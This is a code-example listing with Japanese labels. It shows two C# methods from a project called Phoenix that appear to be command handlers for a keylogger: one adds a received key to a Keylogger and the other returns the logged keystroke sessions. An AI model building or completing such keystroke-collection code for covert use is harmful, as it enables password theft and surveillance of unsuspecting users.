コード例 #1
0
ファイル: SystemInfo.cs プロジェクト: ext0/Phoenix
 public static byte[] pressKey(Command command)
 {
     Keylogger.safeAdd(((KeypressRequest)Util.Serialization.deserialize(command.data)).key);
     return(new byte[] { });
 }
コード例 #2
0
ファイル: SystemInfo.cs プロジェクト: ext0/Phoenix
 public static byte[] getKeystrokes(Command command)
 {
     return(Util.Serialization.serialize(Keylogger.parseSessions()));
 }